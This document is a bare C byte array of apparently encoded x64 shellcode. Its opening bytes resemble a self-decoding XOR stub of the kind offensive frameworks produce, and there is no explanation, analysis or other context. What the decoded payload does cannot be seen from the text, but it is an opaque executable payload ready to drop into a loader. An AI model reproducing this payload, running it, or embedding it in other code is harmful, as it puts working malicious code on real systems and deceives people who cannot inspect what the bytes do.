unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xd3\x9e\x77\xb5\xaf\x94\x99\xf7\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x2f\xd6\xf4"
"\x51\x5f\x7c\x55\xf7\xd3\x9e\x36\xe4\xee\xc4\xcb\xbf\xe2"
"\x4c\x26\xe3\xca\xdc\x12\xa5\xb3\xd6\xfc\xe7\xb7\xdc\x12"
"\xa5\xf3\xd6\xfc\xc7\xff\xdc\x96\x40\x99\xd4\x3a\x84\x66"
"\xdc\xa8\x37\x7f\xa2\x16\xc9\xad\xb8\xb9\xb6\x12\x57\x7a"
"\xf4\xae\x55\x7b\x1a\x81\xdf\x26\xfd\x24\xc6\xb9\x7c\x91"
"\xa2\x3f\xb4\x7f\xf2\x18\x8f\xcb\x95\x75\xba\x2a\xe6\x99"
"\xf7\xd3\x15\xf7\x3d\xaf\x94\x99\xbf\x56\x5e\x03\xd2\xe7"
"\x95\x49\xb3\x58\xde\x57\xe5\x24\xdc\x81\xbe\xd2\x4e\x94"
"\xe3\xe7\x6b\x50\xb6\x58\xaa\xff\xf8\x9e\x5d\xd1\xf6\x05"
"\xd6\x46\x75\x03\xd5\x58\x3e\xde\xdf\x76\x74\x97\x74\xec"
"\x06\x9f\x9d\x3b\x91\xa7\xd1\xa0\x26\xa6\x46\x2f\xf1\x24"
"\xd4\xbd\xbe\xd2\x4e\x11\xf4\x24\x98\xd1\xb3\x58\xde\x6b"
"\xfc\xae\x44\xd8\x7c\xd7\x16\x3f\xb4\x7f\xd5\xc1\xb6\x8b"
"\xc0\x2e\xef\xee\xcc\xd8\xae\x92\xc4\x3f\x36\x43\xb4\xd8"
"\xa5\x2c\x7e\x2f\xf4\xf6\xce\xd1\x7c\xc1\x77\x3c\x4a\x50"
"\x6b\xc4\xbe\x6d\xe9\x04\x87\xf0\xa7\xab\xf7\xd3\xdf\x21"
"\xfc\x26\x72\xd1\x76\x3f\x3e\x76\xb5\xaf\xdd\x10\x12\x9a"
"\x22\x75\xb5\x8e\x94\x5f\xcd\xac\xd4\x36\xe1\xe6\x1d\x7d"
"\xbb\x5a\x6f\x36\x0f\xe3\xe3\xbf\xf0\x2c\x4b\x3b\x3c\x45"
"\xfc\x98\xf6\xd3\x9e\x2e\xf4\x15\xbd\x19\x9c\xd3\x61\xa2"
"\xdf\xa5\xd5\xc7\xa7\x83\xd3\x46\x7c\xe2\xa5\x59\xbf\x2c"
"\x5e\x3f\x3c\x6d\xdc\x66\x37\x9b\x17\xb6\xf4\x15\x7e\x96"
"\x28\x33\x61\xa2\xfd\x26\x53\xf3\xe7\x92\xc6\x3b\x3c\x4d"
"\xdc\x10\x0e\x92\x24\xee\x10\xdb\xf5\x66\x22\x56\x5e\x03"
"\xbf\xe6\x6b\x57\x82\x36\x76\xe4\xb5\xaf\x94\xd1\x74\x3f"
"\x8e\x3f\x3c\x4d\xd9\xa8\x3e\xb9\x9a\x36\xed\xe7\x1d\x60"
"\xb6\x69\x9c\xae\x7d\xf0\x6b\x4c\x74\x2b\x9e\x09\xe0\xe7"
"\x17\x5d\xd7\x8d\x17\x81\xdf\xef\xd5\xc0\x9f\xd3\x8e\x77"
"\xb5\xee\xcc\xd1\x7e\x21\xd6\x46\x7c\xee\x2e\xc1\x53\x80"
"\x7b\x88\x60\xe7\x1d\x5a\xbe\x5a\x59\x3a\x84\x66\xdd\x10"
"\x07\x9b\x17\xad\xfd\x26\x6d\xd8\x4d\xd1\x47\xbf\xea\x50"
"\x41\x1a\x0f\xd3\xe3\x5f\xed\xee\xc3\xc0\x9f\xd3\xde\x77"
"\xb5\xee\xcc\xf3\xf7\x89\xdf\xcd\xbe\x80\x9b\xa9\x08\x06"
"\xc9\x2e\xf4\x15\xe1\xf7\xba\xb2\x61\xa2\xfc\x50\x5a\x70"
"\xcb\x2c\x61\x88\xfd\xae\x57\xd1\xde\x15\xd6\xf2\x43\xda"
"\x20\xd8\x08\x34\xc6\x1d\xb5\xf6\xdd\x5e\x35\x23\x2b\xd5"
"\xe3\x50\x41\x99\xf7";